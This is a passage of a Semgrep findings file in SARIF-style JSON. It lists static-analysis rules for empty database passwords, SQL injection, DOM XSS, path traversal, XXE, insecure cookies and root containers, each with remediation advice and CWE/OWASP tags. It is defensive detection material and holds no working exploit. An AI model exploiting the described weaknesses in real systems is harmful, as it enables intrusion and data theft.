vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password","id":"python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password","name":"python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to leverage biometrics via Local Authentication, which returns a simple boolean result for authentication. This design is subject to bypass with runtime tampering tools such as Frida, Substrate, and others. Although this is limited to rooted (jailbroken) devices, consider implementing biometric authentication the reliable way - via Keychain Services."},"help":{"markdown":"The application was observed to leverage biometrics via Local Authentication, which returns a simple boolean result for authentication. This design is subject to bypass with runtime tampering tools such as Frida, Substrate, and others. Although this is limited to rooted (jailbroken) devices, consider implementing biometric authentication the reliable way - via Keychain Services.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.biometrics-and-auth.local-biometrics.insecure-biometrics)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication)\n - [https://shirazkhan030.medium.com/biometric-authentication-in-ios-6c53c54f17df](https://shirazkhan030.medium.com/biometric-authentication-in-ios-6c53c54f17df)\n","text":"The application was observed to leverage biometrics via Local Authentication, which returns a simple boolean result for authentication. This design is subject to bypass with runtime tampering tools such as Frida, Substrate, and others. Although this is limited to rooted (jailbroken) devices, consider implementing biometric authentication the reliable way - via Keychain Services."},"helpUri":"https://semgrep.dev/r/swift.biometrics-and-auth.local-biometrics.insecure-biometrics","id":"swift.biometrics-and-auth.local-biometrics.insecure-biometrics","name":"swift.biometrics-and-auth.local-biometrics.insecure-biometrics","properties":{"precision":"very-high","tags":["CWE-305: Authentication Bypass by Primary Weakness","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.biometrics-and-auth.local-biometrics.insecure-biometrics"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Cookie Secure flag is explicitly disabled. You should enforce this value to avoid accidentally presenting sensitive cookie values over plaintext HTTP connections."},"help":{"markdown":"Cookie Secure flag is explicitly disabled. You should enforce this value to avoid accidentally presenting sensitive cookie values over plaintext HTTP connections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings)\n - [https://docs.microsoft.com/en-us/aspnet/web-api/overview/advanced/http-cookies](https://docs.microsoft.com/en-us/aspnet/web-api/overview/advanced/http-cookies)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.web.security.formsauthentication.requiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_FormsAuthentication_RequireSSL](https://docs.microsoft.com/en-us/dotnet/api/system.web.security.formsauthentication.requiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_FormsAuthentication_RequireSSL)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.web.security.roles.cookierequiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_Roles_CookieRequireSSL](https://docs.microsoft.com/en-us/dotnet/api/system.web.security.roles.cookierequiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_Roles_CookieRequireSSL)\n","text":"Cookie Secure flag is explicitly disabled. You should enforce this value to avoid accidentally presenting sensitive cookie values over plaintext HTTP connections."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings","id":"csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings","name":"csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Network ACLs allow you to reduce your exposure to risk by limiting what can access your key vault. The default action of the Network ACL should be set to deny for when IPs are not matched. Azure services can be allowed to bypass."},"help":{"markdown":"Network ACLs allow you to reduce your exposure to risk by limiting what can access your key vault. The default action of the Network ACL should be set to deny for when IPs are not matched. Azure services can be allowed to bypass.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/key_vault#network_acls](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/key_vault#network_acls)\n - [https://docs.microsoft.com/en-us/azure/key-vault/general/network-security](https://docs.microsoft.com/en-us/azure/key-vault/general/network-security)\n","text":"Network ACLs allow you to reduce your exposure to risk by limiting what can access your key vault. The default action of the Network ACL should be set to deny for when IPs are not matched. Azure services can be allowed to bypass."},"helpUri":"https://semgrep.dev/r/terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl","id":"terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl","name":"terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"RSA keys should be at least 2048 bits based on NIST recommendation."},"help":{"markdown":"RSA keys should be at least 2048 bits based on NIST recommendation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms)\n","text":"RSA keys should be at least 2048 bits based on NIST recommendation."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key","id":"java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key","name":"java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The last user in the container is 'root'. This is a security hazard because if an attacker gains control of the container they will have root access. Switch back to another user after running commands as 'root'."},"help":{"markdown":"The last user in the container is 'root'. This is a security hazard because if an attacker gains control of the container they will have root access. Switch back to another user after running commands as 'root'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/dockerfile.security.last-user-is-root.last-user-is-root)\n - [https://github.com/hadolint/hadolint/wiki/DL3002](https://github.com/hadolint/hadolint/wiki/DL3002)\n","text":"The last user in the container is 'root'. This is a security hazard because if an attacker gains control of the container they will have root access. Switch back to another user after running commands as 'root'."},"helpUri":"https://semgrep.dev/r/dockerfile.security.last-user-is-root.last-user-is-root","id":"dockerfile.security.last-user-is-root.last-user-is-root","name":"dockerfile.security.last-user-is-root.last-user-is-root","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: dockerfile.security.last-user-is-root.last-user-is-root"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected non-static command inside $EXEC. Audit the input to '$EXEC'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside $EXEC. Audit the input to '$EXEC'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-exec.dangerous-exec)\n - [https://guides.rubyonrails.org/security.html#command-line-injection](https://guides.rubyonrails.org/security.html#command-line-injection)\n","text":"Detected non-static command inside $EXEC. Audit the input to '$EXEC'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-exec.dangerous-exec","id":"ruby.lang.security.dangerous-exec.dangerous-exec","name":"ruby.lang.security.dangerous-exec.dangerous-exec","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-exec.dangerous-exec"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password","id":"rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password","name":"rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Cannot determine what '$UNK' is and it is used with a ' which would add the script to the page. Consider allowlisting appropriate values or using an approach which does not involve the URL."},"help":{"markdown":"Detected possible DOM-based XSS. This occurs because a portion of the URL is being used to construct an element added directly to the page. For example, a malicious actor could send someone a link like this: http://www.some.site/page.html?default= which would add the script to the page. Consider allowlisting appropriate values or using an approach which does not involve the URL.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.security.dom-based-xss.dom-based-xss)\n - [https://owasp.org/www-community/attacks/DOM_Based_XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS)\n","text":"Detected possible DOM-based XSS. This occurs because a portion of the URL is being used to construct an element added directly to the page. For example, a malicious actor could send someone a link like this: http://www.some.site/page.html?default= which would add the script to the page. Consider allowlisting appropriate values or using an approach which does not involve the URL."},"helpUri":"https://semgrep.dev/r/javascript.browser.security.dom-based-xss.dom-based-xss","id":"javascript.browser.security.dom-based-xss.dom-based-xss","name":"javascript.browser.security.dom-based-xss.dom-based-xss","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.security.dom-based-xss.dom-based-xss"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Passing unsanitized user input to a Script Engine or other means of dynamic code evaluation is unsafe. This could lead to code injection with data leakage or arbitrary code execution as a result. Avoid this, or use proper sandboxing if user code evaluation is intended."},"help":{"markdown":"Passing unsanitized user input to a Script Engine or other means of dynamic code evaluation is unsafe. This could lead to code injection with data leakage or arbitrary code execution as a result. Avoid this, or use proper sandboxing if user code evaluation is intended.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request)\n - [https://cwe.mitre.org/data/definitions/95.html](https://cwe.mitre.org/data/definitions/95.html)\n","text":"Passing unsanitized user input to a Script Engine or other means of dynamic code evaluation is unsafe. This could lead to code injection with data leakage or arbitrary code execution as a result. Avoid this, or use proper sandboxing if user code evaluation is intended."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request","id":"java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request","name":"java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.rocket.sql.sqlx-taint.sqlx-taint)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.rocket.sql.sqlx-taint.sqlx-taint","id":"rust.rocket.sql.sqlx-taint.sqlx-taint","name":"rust.rocket.sql.sqlx-taint.sqlx-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.rocket.sql.sqlx-taint.sqlx-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"These permissions `$BITS` are widely permissive and grant access to more people than may be necessary. A good default is `0o644` which gives read and write access to yourself and read access to everyone else."},"help":{"markdown":"These permissions `$BITS` are widely permissive and grant access to more people than may be necessary. A good default is `0o644` which gives read and write access to yourself and read access to everyone else.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-file-permissions.insecure-file-permissions)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"These permissions `$BITS` are widely permissive and grant access to more people than may be necessary. A good default is `0o644` which gives read and write access to yourself and read access to everyone else."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-file-permissions.insecure-file-permissions","id":"python.lang.security.audit.insecure-file-permissions.insecure-file-permissions","name":"python.lang.security.audit.insecure-file-permissions.insecure-file-permissions","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-file-permissions.insecure-file-permissions"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found an HTTP server without TLS. Use 'http.ListenAndServeTLS' instead. See https://golang.org/pkg/net/http/#ListenAndServeTLS for more information."},"help":{"markdown":"Found an HTTP server without TLS. Use 'http.ListenAndServeTLS' instead. See https://golang.org/pkg/net/http/#ListenAndServeTLS for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.use-tls.use-tls)\n - [https://golang.org/pkg/net/http/#ListenAndServeTLS](https://golang.org/pkg/net/http/#ListenAndServeTLS)\n","text":"Found an HTTP server without TLS. Use 'http.ListenAndServeTLS' instead. See https://golang.org/pkg/net/http/#ListenAndServeTLS for more information."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.use-tls.use-tls","id":"go.lang.security.audit.net.use-tls.use-tls","name":"go.lang.security.audit.net.use-tls.use-tls","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.use-tls.use-tls"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password","id":"rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password","name":"rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask","id":"python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask","name":"python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.sqlite-express.sqlite-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.sqlite-express.sqlite-express","id":"javascript.express.db.sqlite-express.sqlite-express","name":"javascript.express.db.sqlite-express.sqlite-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.sqlite-express.sqlite-express"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. 